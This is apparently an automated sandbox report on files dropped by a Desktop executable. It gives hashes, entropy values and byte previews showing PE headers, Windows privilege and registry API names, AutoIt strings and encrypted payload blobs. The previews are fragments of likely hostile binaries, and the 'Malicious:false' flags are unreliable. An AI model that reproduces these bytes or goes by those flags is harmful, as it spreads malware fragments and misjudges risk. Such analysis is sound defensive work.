                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):400382
                                                      Entropy (8bit):7.999557196070158
                                                      Encrypted:true
                                                      SSDEEP:12288:PKNEkDMXn1f8OU+IrrA+eh45xwkXF5rBoZH4S:CNE0MlkOU5rApOxw8oZl
                                                      MD5:B786563F77CB34317241685E18A73F01
                                                      SHA1:53991C917BCA0F332D04B1AFAEB662DD74733414
                                                      SHA-256:873AF222D88CF19A1E39DE1AEFC5DEA1D721F917807F1BAFA7F75669787F8D06
                                                      SHA-512:204DCDD2D6159EB9EE48B05D90B3AC054631F478114862056B449A7E7001E98AA9A448AAB43733DDA911D7D093AD859002E0D9F07A372E0BEB1225E594C52DED
                                                      Malicious:false
                                                      Preview:G.....Pf._....IG.-..M"...c-.*.g...9Y../v........L.L...p....#|.S...[K.?6.^.^9.1Uo.I.0.....RLr.R.X.(.Y...N...6.....3.#.<!.....].Y...C../....P..G...U.q..h......T..9F.Jk..>..V/..T.g20.b.X....W.o..|.7K....r."....QP+_...Q..6....J.H.W..I.YH...o......C...'.8.}......u9vpI.x....z.No...(.MC.0..5l>...uR.eV...E3\k.V....1OF.yaB....{...&.:....R;N(.J.j-. =..BC...3..fZ*24....4.s_>...6.YNf....?..8.:b...].iR...E.0n...>..~......K..8.i..............D..e...uw...y....sH..PLos7.e...C...P.<<....!....ql.C..k;...o........6..i.VM...L..\.|.'..wf$..g...*_.5.<.H.._.."U....d. ....N...!1.&7?5d.(_]s.m.veI..d.rv.Z.N...N..#aj.M...a.a2.9(.q._.\..].G.K!..p.Io...F..s...y.&.1x.C.S.mgi.h@.R.....v....\..l..[......Q-..G3....m"....7.........|..!m.{..(......9.....$3v...:....yV...6.s'EA.*.x......xGCI.|.(...Wx....wJ.}..n.3g.....W^...0...k...?.....J.U..I!D...y.Z5tc..)~....pk'Q.`<VC.........X.l..W..^.}.$?:...>~.#..,...2b.\.|C...2m...w?8.u.....\5.....g..!..o......+.]..9e(......./?...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):5.277305546210652
                                                      Encrypted:false
                                                      SSDEEP:192:wtO1kG7WqkxoXCPfp2hu9ipa9HQREIvKrHsceaj:OC7VkxhPfp2hu9i09PrOaj
                                                      MD5:C1C0116028A32EFF0246F16D3CD2E551
                                                      SHA1:F5DD182836135545E7A27CCB5BEFEFDFD6D62292
                                                      SHA-256:590CC89DAF6EEB61091587B94C4E13BF4D5F6DCA46707A4BBDA20C407254133A
                                                      SHA-512:6A3DFE3E591A83F7F7F000CDB0B393675C15B1C226402C626E5377E4DE1C1461C4FC4DDCEAA2357F60EEC9CF0F467F354C2CA6C3F796C20974850ECE5C8AB4BB
                                                      Malicious:false
                                                      Preview:...?......?.hc#.]G>.......@...,*..?.Q.x..F>.....@.@...p...?ek.R..N>.......@.......?...n@>.......@....b..?......O>.......@...$Q/.?.CJ...O>.....@.@.....E.?......G>.......@....[.?.3.E.{A>.......@...T.p.?.SfI.S:>.......@...X..?B6).1.<>.....@.@....3..?>....7>.......@....$..?s(....N>.......@...@...?V..6.f=>.......@...(...?..{....>.....@.@...(W..?..-.Jg >.......@.......?.."a.PK>.......@...xm..?,S...6>.......@.......?.6..hb">.....@.@.....-.?.k,...<>.......@...X.>.?.0....=>.......@.....O.?..IX.H>.......@....-_.?......@>.....@.@.....n.?....2.E>.......@....P~.?.=...8>.......@...lj..?..[j&,>.......@...L7..?..x..82>.....@.@.......?c.#V..B>.......@...0..?7...Y.>.......@...P...?..[..p&>.......@......?h4.M..A>.....@.@.......?E.p.l.E>.......@....+..?.o..$.E>.......@...h...?\...*.K>.......@.......?-.?...B>.....@.@...P8..?.(l.|.@>.......@....p!.?u...@.J>.......@...@p-.?..V...1>.......@....89.?.....5>.....@.@...<.D.?.....7>.......@...h)P.?.R`D.OG>.......@....T[.?9%....K>.......@....Mf.?...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):48126
                                                      Entropy (8bit):7.995946651093549
                                                      Encrypted:true
                                                      SSDEEP:768:aRsMwKJ9ZzOxwGx7z+jRIcUuNZKcdgLKpyBjn6eK1nPNkbP5oSWdD3ne0bOGQJpN:aRsu/OxlVaju7mgLK0ine5rM3npbU6M
                                                      MD5:B952487AB97D8B48149E33634BB0AAED
                                                      SHA1:C53FC9F7D801971D6C22E180592948174BFD0723
                                                      SHA-256:269AE36E9BF26FFFFDA5C3680AADC27B18B8B07EFD9972F633328E02D3B30A46
                                                      SHA-512:F379EC1039B898C5C65BA721C87F2893FE4AA18B657A109BAE93C272BB1B5D93F63FA106D3CBE545F2712DAE9F37BA8A8CC35DCFBB44C00F98DF3F3F501E8A72
                                                      Malicious:false
                                                      Preview:2.f........qP.F9.\X..5v@u..m.o.a....m...9\..EZ...'.j...N..C..........Y..t...P...........ZR)....+..........>...Y.(.sv.%K<0.p5.....Z.mlJ.x/+l...#R...#..\T+.;..._.._.u.@..i...H05..fQ..9!.Vd....*3..*......u.V42..5Y8K.k.d..8...,..9.6~...g...~......i.QT.iXkmg.=.kYP.%..J...FW..i.^.y$..Y.....+`.t.<..._.E..31\....=.7*|..:.3.z.\.....0[6......2K.%.E.+.A.n*V...BEK5.@.....Gr......s..],.....C.U..s...<.*.*...R.....r..&h.........Pe..:..hTI2R...i.:G......{..AP0K...E....v$...t..DwA,73.U...u))5q..l.B.)*.h....OE...".....E....8....4^.851Xgc.5....>88.2.......Y2.g.......=D.._/....;+a.W..m.\.3.z...+..j..Z.TL...k......o..u.T....u..m^.,.!fy.I..~. P-./.m_ZE.\."-...Da..f....y|.-SH.R3....+l....XGfZY*..?.....z..[9._..M.....,..;.mX......nL.....H^..X..0.m..6.?..!"K..CP...j vG...|.......<v.......%..FS...j..r...."..........`E.]r..<.jUu8\I.I...._i.c.!=.. .Z....(IHTO..V.XT...<...._...6.7..4.l.|v....E..wv..wn.*.n.A...l..?..OD...%).`..9..........."K.x;.s.H....Zw..=s........L.........
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):52224
                                                      Entropy (8bit):5.891932242893493
                                                      Encrypted:false
                                                      SSDEEP:768:Ihp/lNVi6dFiwc/RGNul1Eovu86eV3QKYwlrRX9Qywqp9sK1xhNGE0psuP:8gNpkU5uG3xYwBMK1zN90psuP
                                                      MD5:D98F1B8625B4F3E8FFDA35D8F7163186
                                                      SHA1:F718D771EB301DED86FB39FE48243B903FB308DB
                                                      SHA-256:79802AD8EFFA3C4AA8B31846F44F742C08BB33622111D58AA8919A4DEA581BF3
                                                      SHA-512:7C3254847F1C1F67323ABBC1FC1419A2928838250530CD4F619996975B244880E67BA5FFEAED5AFED3C71BAFD21AF78C587E907964125DB7C5ECA89F9A648473
                                                      Malicious:false
                                                      Preview:.W....t..F.PRW.......3.f.Dw._^].V..N..N...V....Y..^...VW...G.P.p........w.Y..u.!w._^.U..Vj....D....U.Y....a.....~..u..N....N.^]....F..H...V.5(.L...t..N.....V.x...Y^.Vj<.......Y..t..>...Q........(.L..(.L.^.3...U...T...SV..W.~..............F8.P.............I.................F........F.......P...3.9G....................Pj.....h..I........3.f.N3.N..N .N$.N(.N,f.N0.N2j.[........H..#......u/.^..^..^+.^).^'.^%.^!.^-.^/9N.u..^18].......^0.E..M.P..\.I.P....I.9].u..^4.e...}.j.3.Y.8F4ti!E..M.!E.......tK.M........E.t5.M.Q..}..t..u.....I.f.E.f.F6.._^[..]......*...P......?.C...E.P....I..E.P....I....,.L...t.P...Y.Vj..).....Y..t..p....5,.L..,.L.^.3...U....SV..4.I..]...;......3.@^[..]...U..QSW3.E.SPSh. .....]...@.I..E.j.SSh. ...G...@.I._[..].drL...u....h..C..drL......Y...L..U..Q.E.VW.=xrL......f...j.j.^VVj.jcW..D.I._^..].U.....(.L... .x..VW.......E..L$.3..xrL.3..=|rL.F.=prL..|$..|$..t$..|$..|$ .t$$......D$..D$......D$...d.I.h..E...rL.....YV.....Y..,.L.......u..!....,.L.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22528
                                                      Entropy (8bit):1.8812359195771542
                                                      Encrypted:false
                                                      SSDEEP:96:pMHarucfTE6QZSuuMBgtQ5bqyjbDN3KcFC6OUhoSkb/r0uN:pCarucTE6QZSyPTN3KccuIb/r0I
                                                      MD5:015711CA9A5D1ACDD21D6052184564CA
                                                      SHA1:25B2414035A247ACD4B4385BBFCC295C86CAE8AD
                                                      SHA-256:45721C1583EE4B42C3D2F4AD6F8FD542C85C79F6392B1C1F77F149952C9AA5B0
                                                      SHA-512:C5A04EB86FB2248855923E6FA4706B150EA1EE7BD1B484EC5CB64E36BE156702C873F57BF0A15874FF63CFD68444D3E79B3E922257D73EAF5DDAC473A28A9D53
                                                      Malicious:false
                                                      Preview:eateSolidBrush..K.CreatePen.~.SetBkColor..j.RoundRect...SetBkMode...GetObjectW....SetViewportOrgEx.._.Rectangle...BeginPath.P.PolyDraw....Ellipse.:.MoveToEx....AngleArc..6.LineTo....CloseFigure...SetPixel....EndPath...StrokePath....StrokeAndFillPath.2.ExtCreatePen..GDI32.dll...GetOpenFileNameW....GetSaveFileNameW..COMDLG32.dll..a.RegOpenKeyExW.0.RegCloseKey.n.RegQueryValueExW..4.RegConnectRegistryW.w.InitializeSecurityDescriptor..v.InitializeAcl...AdjustTokenPrivileges...OpenThreadToken...OpenProcessToken....LookupPrivilegeValueW...DuplicateTokenEx..|.CreateProcessAsUserW..}.CreateProcessWithLogonW.6.GetLengthSid..v.CopySid...LogonUserW.. .AllocateAndInitializeSid..Q.CheckTokenMembership.. .FreeSid.Z.GetTokenInformation.H.GetSecurityDescriptorDacl.$.GetAclInformation.#.GetAce....AddAce....SetSecurityDescriptorDacl.}.InitiateSystemShutdownExW.e.GetUserNameW..9.RegCreateKeyExW.~.RegSetValueExW..O.RegEnumKeyExW.D.RegDeleteKeyW.H.RegDeleteValueW.R.RegEnumValueW.ADVAPI32.dll..".ShellExecute
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):30720
                                                      Entropy (8bit):5.1615707130368165
                                                      Encrypted:false
                                                      SSDEEP:768:tAGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmn:tl6JPTcUNx6/xhn
                                                      MD5:76377A984BC896CE7ABDF74C2F764CAE
                                                      SHA1:50319F2D1EA11FC66BA47241280E8C45536F30F2
                                                      SHA-256:17F4C3F515DE14331A679CE7F14E4E47523E014E90E7AA0FE10D0E23031821E3
                                                      SHA-512:F832CB58125100B8D49DB3879B12C1CF459D410C776B115710A418B0E83BF449FBF104332C143F0C3F01DD49F3350816E4C010420D9DA3B457C0CA09BBB7FDAA
                                                      Malicious:false
                                                      Preview:S.2.....I.P.A.D.D.R.E.S.S.3.....I.P.A.D.D.R.E.S.S.4.....C.R.....L.F.....C.R.L.F.....D.E.S.K.T.O.P.W.I.D.T.H.....D.E.S.K.T.O.P.H.E.I.G.H.T...D.E.S.K.T.O.P.D.E.P.T.H.....D.E.S.K.T.O.P.R.E.F.R.E.S.H.....C.O.M.P.I.L.E.D.....C.O.M.S.P.E.C...U.S.E.R.N.A.M.E.....T.E.M.P.D.I.R...U.S.E.R.P.R.O.F.I.L.E.D.I.R.....H.O.M.E.D.R.I.V.E...H.O.M.E.P.A.T.H.....H.O.M.E.S.H.A.R.E...L.O.G.O.N.S.E.R.V.E.R...L.O.G.O.N.D.O.M.A.I.N...L.O.G.O.N.D.N.S.D.O.M.A.I.N.....I.N.E.T.G.E.T.B.Y.T.E.S.R.E.A.D.....I.N.E.T.G.E.T.A.C.T.I.V.E...N.U.M.P.A.R.A.M.S...H.O.T.K.E.Y.P.R.E.S.S.E.D...A.U.T.O.I.T.P.I.D...A.U.T.O.I.T.U.N.I.C.O.D.E...A.U.T.O.I.T.X.6.4...U.N.I.C.O.D.E...M.U.I.L.A.N.G..............?.......?.......?.UGP.ML.................@.....K...............K..~K..................ML.4.K.............D.K.P.K..~K......ML.................@...4.K..............ML...K..............ML...K...............K...K......ML.................@.....K.........Wow64DisableWow64FsRedirection..Wow64RevertWow64FsRedirection....{E..zE..|E.c.C.c.C.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):27648
                                                      Entropy (8bit):6.486390059741875
                                                      Encrypted:false
                                                      SSDEEP:384:TVuMt2FoLglQRrJZC8w4WxqlVGQl3DPCyvUi4kBM+bYXcqmjw0YhIR6s2:T0p4pZP40VLhDPCp5eqMw0jR6s2
                                                      MD5:955013C342D17ADAA4B16EA6E9284960
                                                      SHA1:E07CA1EF8B847DA71ABDD743EB3714D1B8063872
                                                      SHA-256:D74D86A96397CB511DF1B60973CF5BA998D9B00981557A8497CD66759BEA2C42
                                                      SHA-512:F484CECF6F74E21792DF089737038AB064BCC05A74392552310381457A5C26EA46ECA7E318C5898D4D50858F9208C0AC5366365DF3E0657E9C69FEBC5EB4EEAB
                                                      Malicious:false
                                                      Preview:.h.....ir.......w...M..A..M.......@.Ph.....!|....w..f..S..9w..f..T../w..f..U..%w..f..V...w....@..M.Ph......{...w...F...........$..,D..E.M.... ....t$.J.j...|....C.....|.......u.]..z..R.....u....]..z...E.....]..z...]..C..z...]........~z...K..E.P..2...E....._z...].._z...............$..,D..E.M..........t..J.j..U......].....U..Dz..R.!....U.......1z...E.......U.....z..3..........z...[...z..........K..E.P.c1...]....U...y...U.3...y...A..M..D....@.Pj{.~z...M.......u..M.jz.iz...v}..Q......E......2z...........u...$.%-D..E......u..P..\.I..u..x.].....iu...K..b.M.....Yu..Q.>....Nu...E..p..........u..?.M.....0u..Q..O...%u...M......u..Q..O....u...]......u.........S.z........t....@..M.Pjr.y...Cu........@.Pjy..y....u...E...P.......u...E...P.@....u...E...P......t...E...P..@....t.........t..P..\.I..6.\.>.....t...O..G...p..........6.<.......t..Q..O...t.........t..Q..O...wt...>....mt.........W........Xt...E.....|t..P..\.I..u..b.u.....et...N..L.E..p..Y.......u..?.M.....Bt..Q.|N...7t...M.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):57344
                                                      Entropy (8bit):6.661614213701607
                                                      Encrypted:false
                                                      SSDEEP:768:8nM8+aZKINulI1+lRKw4sWGuv6crjQAVlvZEx2zinQD2tR/i01A/ES4KY2lfwMwP:8nMOKzlvlao/RIs2ziQD2tR/i0027Es
                                                      MD5:AAFB0D1FA77BF4A530DBE65111BA8A4B
                                                      SHA1:6166978E189029437FDA61EC05D88933C3729DBE
                                                      SHA-256:1E35095AB3E8212EB3F737F0CCF36CD9D4C540B4B4359B3AB1DA80759647E926
                                                      SHA-512:A2F91B3D0CBF17D41832D8B4D9AD91C711F1D496A78EE68A3388B9F2A9A9DBCC549D6717A5512A299DD31D2ECBB6FDAC7ECB5C11E0671E7897A864D952466B8F
                                                      Malicious:false
                                                      Preview:~.+.t.3.......M........`.....~...B.+.t.3.......M........>.....~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3...._....F.;B............B.+.t.3.......M........2.....~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M........y.....~...B.+.t.3.......M........W.....N...B.+.t.3........E......3....1....F.;B.........B...~.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M........l.....~...B.+.t.3.......M........J.....~...B.+.t.3.......M........(.....N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M.........
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):46700
                                                      Entropy (8bit):6.891450719198379
                                                      Encrypted:false
                                                      SSDEEP:768:/+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:/+9BBVgCOa1ZBPaPQaEwo0yv
                                                      MD5:CF536EF835E5A3F7F14AE71806BE018A
                                                      SHA1:51022D451BF209412FF3E636BD16534CA6FDDF49
                                                      SHA-256:47C59D7F183F7EFEBC6254FABEB894D7ACB323CBF6FAF7C6407F507B89012930
                                                      SHA-512:86FD1DDF3E6A3D6180E636E2976B1B7F874B17D52691EF9798400FB706360362A7487861F4E97AEFA136CF236A67398ABE630F3E6E8847A67599A9911061793A
                                                      Malicious:false
                                                      Preview:...................................................g.....................................b...]...]...]...]...]...]...]...]...]...]...]...]...b.......................................g...............................................................Q............................................p...`...]...]...]...]...`...p..............................................R.......................................................................'...................................................................................................................(...................................................................................t...................................................................................................t................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):91
                                                      Entropy (8bit):2.8289195204634177
                                                      Encrypted:false
                                                      SSDEEP:3:cTIMEYaUqt/vll:3oq
                                                      MD5:21ED984A31AB0C638602E6012A9EC121
                                                      SHA1:B501C01F8B333D5EA0A07B96A1748CCFD7A5EB70
                                                      SHA-256:F6548B60424F109EA826404E9383C00996904A4E6020EC988AB533FDC4A46C17
                                                      SHA-512:195ACA33C0B3B0272C4154DC2EA700C05E00EFAE6B9133829E707DE7998BD509BFD5E4884DBAF36DCAC7DC1ECBB09F8D61225FB8FCCF9D3B9C0EB7C6FDA5331B
                                                      Malicious:false
                                                      Preview:wagemissileaffiliatesgreeting..MZ......................@...................................
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):41984
                                                      Entropy (8bit):4.379351540303496
                                                      Encrypted:false
                                                      SSDEEP:384:IfU84444QnoooooooooooooooooooooooYooootooooooooooooooYooooooooot:ISSg
                                                      MD5:542951AE6E7BB9E829101468D50F317C
                                                      SHA1:85ACBA0098517CE9F951E7DC6039C7D1DAE6BEF6
                                                      SHA-256:9696A97AFB80A10770E65628B78B9653EB8F4E186CA196FF5864BFC1D3ACB163
                                                      SHA-512:BB31306D0F51B97209F4BCEB14FC6E6EA08C27C4DB8891EE067BB751E64FCF16C1E6FFC51EC8057CBEFE7B41BD82EB94FE8B8F53389FF3AC0F766C57056EED80
                                                      Malicious:false
                                                      Preview:=.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!...j.j.j.j.r.r.r.r.!.z.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r....................................................................... . .!. . .!. . .". .!.r.r.$.$.$.$.$.$.$.$.$.$.r.r.r.r.r.r.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):28672
                                                      Entropy (8bit):6.613288717679894
                                                      Encrypted:false
                                                      SSDEEP:768:R3EGoSmNpLQEGBoAyGcjXB2SCursGHv7mlHW7nn:B5LmNpRGDox2S3hPtn
                                                      MD5:9BB050E020EB499EE53CFE44BA79546D
                                                      SHA1:240CBDAB66BFF6C6DC3BCD448FA32944A9724534
                                                      SHA-256:0D93AAFF8D4FCAC97623BAE742123F91E3398744A7CAA9D625D1487D1747B2EE
                                                      SHA-512:BB4F6EF6D61D280ED2D57CD58822C4D223ECC4D65E71B7E2093C4B90CC0DE115D47395CAF5F4E0490591A71D2B366FA05DE4B10DF792FCE078BC5D3FF552FD4A
                                                      Malicious:false
                                                      Preview:....M....D$ P..b....j.V.H....Q....L$ .P0...L$0.$...L$0.>0.._^3.[..]...U......dS.].V.L$8W.C..0...`...F....D$..C..0...`...F..x..C..p....m`...F....D$ .C..p....W`...F..L$@W.@..D$..9)...E.3.3....T$4F.L$..x..r).@..H...c....T$4.........3.@..#.L$..T$4.D$.....$n....+....n..I.......\$...~_.t$..D$ ..Wf........T$<Y.........D$...+.....+.......P.t$$R..J...L$$....t$8...._n...D$..4N.....}..G..0...m_...F....D$..G..0...X_...F..t$..x.....Qo...M.F.t$8..Y...|$....Yn..V3..D$0FVP.(W......\$..L$@.\$(.\$0.+...|$8........D$4+...{n..H.......D$..D$<.L$ Wf..........T$(Y.........D$...+L$.....+.......P.t$$R..I..........n...T$$.L$<..+...PSQ.L$L.$...D$@P.L$T.X...t$..D$TVP.t$8..T......L$P.D$...^...D$..L$$.D$(..A.D$..D$(;D$8../....L$@.-.._^3.[..]..........D$...x.T$$.m...........L$....m.....B..U..E.....@.SVW.0....]...F..u..X..F..H..`......xG;..G+.M.S.&...F..0...]..SW.v..M..$...M..E.P._...M...,.._^3.[..]...3....U.....E.VWP......I.....Hn...E..m..@....]..E..]..`...m..].."....}..u....]..]...E..
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):70656
                                                      Entropy (8bit):6.636740865706221
                                                      Encrypted:false
                                                      SSDEEP:1536:PNvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVJRa5oQyyk4qt1FqnLUshVkf88S:PGR5yiPlcQ4NvoWV7a5ouYNqnLzAS
                                                      MD5:8CF6E9F620D8A4C788AF9C6488DA36CB
                                                      SHA1:C2DE7EEAF8D32384110684C62D0A5989A0664139
                                                      SHA-256:8E339CBF4EE474477C36B34A76C59CD0C42D238E1AA2AF2CE67417FD94F3F549
                                                      SHA-512:073245245956A38AAED87EBF8043320496C91B158BE95F2F8A50CB968275E78F4997319E71F4E250B9F983CB6B206B8CFE558CCCCBE25531D4ABD924732A73B9
                                                      Malicious:false
                                                      Preview:.M.h\.K..}...}..Q.E..P.B....M...T.....t..N....E......3hp.K..M..}..Q.E..P......M.........tv......E.........I.j..u.P.7....tU.7.7....I.........Ph.....7.=..I...P..]..3.3....I....E.........Qh.....3..P....I.....2._[..]...U.......V.1....I.........h....PV..H.I.......h..K.P.)...YY..u{W.}.h..K..7....YY..u.Ph)p...Lh..K..7...YY..u.Ph,p...2h.K..7...YY..u.Ph*p....h.K..7.v...YY..u.Ph+p..h....V....I..._..2.^..]...U.......SVW3...VVh.....3....I...@.......a...3j4..}...3..@....E.h.....}...M.j4.u..E..E.E.M..@...P.E......m~....~P.u.Vhs....3....I.h......8...P.u...@.....~..3.f..8....E..0..8...P...YY..t.F;.|.;.u......@.....a.._..^[..]...U...(SVW3...VVh.....0.E.....I..}...h..I....2y...}..uB.........E.j.Vh,....0....I...u.F;.|..oj..E.PV........E..P..x...S....~M.E.j.Wh,....0....I...t1j..E.PW....E....9p.t.h..K....y...E..M.Q...{y..G;.|._^..[..]...W3.WWh.....1....I.WWh....P....I._.U.......SV...D...W..`...3j4..|...3..D.....h......{...M...j4V.E.M.P..D....E......}..|..V.u.hs....3....I.h.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):77824
                                                      Entropy (8bit):7.997684052585039
                                                      Encrypted:true
                                                      SSDEEP:1536:MuPWfPqVMhh4N3UyyW1yvpVM6ua4BGqF392FnqkAuC4DN30thC:D0Fhheav+BGW392rAuHKthC
                                                      MD5:3D6309C91A1CB0A0C43888E3649725D5
                                                      SHA1:A6563604F11099C4050EFB0E38948640DB182D08
                                                      SHA-256:ACDB9761B62BDF56A66E74FB849A249E142185546C9F7CDBAEE24318651DBDC5
                                                      SHA-512:9A3DE566925128AA50114D9F2B570722BC3E38DDB9B4F488A1CFC87D9C8EA590A4A345057244FF498F0396A1A4BED56EF22E98F96B16D9CD98EEA2BD887B33BA
                                                      Malicious:false
                                                      Preview:..._+...!...Ux.j..A...k.....^e......0~..w.K$. .l...X.G.)"....V~Z.|....:......~.R....T..m.........GT..&.?...4...x...%A.^..8.LF...Q.m.C.*..Rt..]..Z.<....=..6^...0{.E.3..Bp......r..a[.~.}{...[}T.+..Q`.h.Lx,..'...XC.sCn..........$V..N,.3G!.U....m0...o...9F.$r.....e.-|+9h2.F.....I.#IEK.l.'...<..'.$2..2.4x/.H....:..V..h...v......V.I...>../.....<.#...f........K....B./...}..SF..`.'.....E2Q..1...R.U..G..\.....@...C.0B...*d..!.k+.y;..A..q......#....h.~.!.G.2.8...{....*.....1...)D.a..i.B7l.-...D1HZ..^l.V..C..&.....eG.Z.=(V.X.l.......[.;.#?nwMd.M...].3.0..bo=...p9`q)..p..5H%.........k.....P.-..?...]........0...+Hi.$.......=.-@..,......._a...%C....".;.eK.MB.......x"1...+..dI..R.X.r?..*..d=...S..!.j^u..:.;...... Q.Mt.1._R..{..@.$qn.....+.4m."f.}...S..g.y.@.dK{..ekl..V.H.P.a. "....m..A_..c..-`G...o.@..Z@1.o#P..|/D[..O..R.V....wTe..K...r.`......flnQ^.U..0.....,13..gy....>.....K.&A..a.:O*G.Ch..........O.o...I;V..V.6bD...6w..h.%......oi..<I....^-....9...{.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):44032
                                                      Entropy (8bit):5.757372220648187
                                                      Encrypted:false
                                                      SSDEEP:768:vRs9WqRD4w9/5SL945pt6QgWWwr2G+jvEHHaD3Sr0Wsc1NKcp:vaM60w9/5Sh4ztrgWVrZ+In23SwFch
                                                      MD5:CE79446653469597F1C276949678AB52
                                                      SHA1:60E23E7BDA5EF927B99D9FEB8A60966CAC6AC714
                                                      SHA-256:321D534DA081AFF44B1A4A21A8EC1FBEA1A3D9FED279D2B7F3F054B7A92DC7A5
                                                      SHA-512:93764E531734812F6E77FBA44F3361C67F315210F83C5BBB624FDF937C227C3CBF933787688491766826B89EFA06CD2CA2B8977C21BD3C953C25044A22F011B7
                                                      Malicious:false
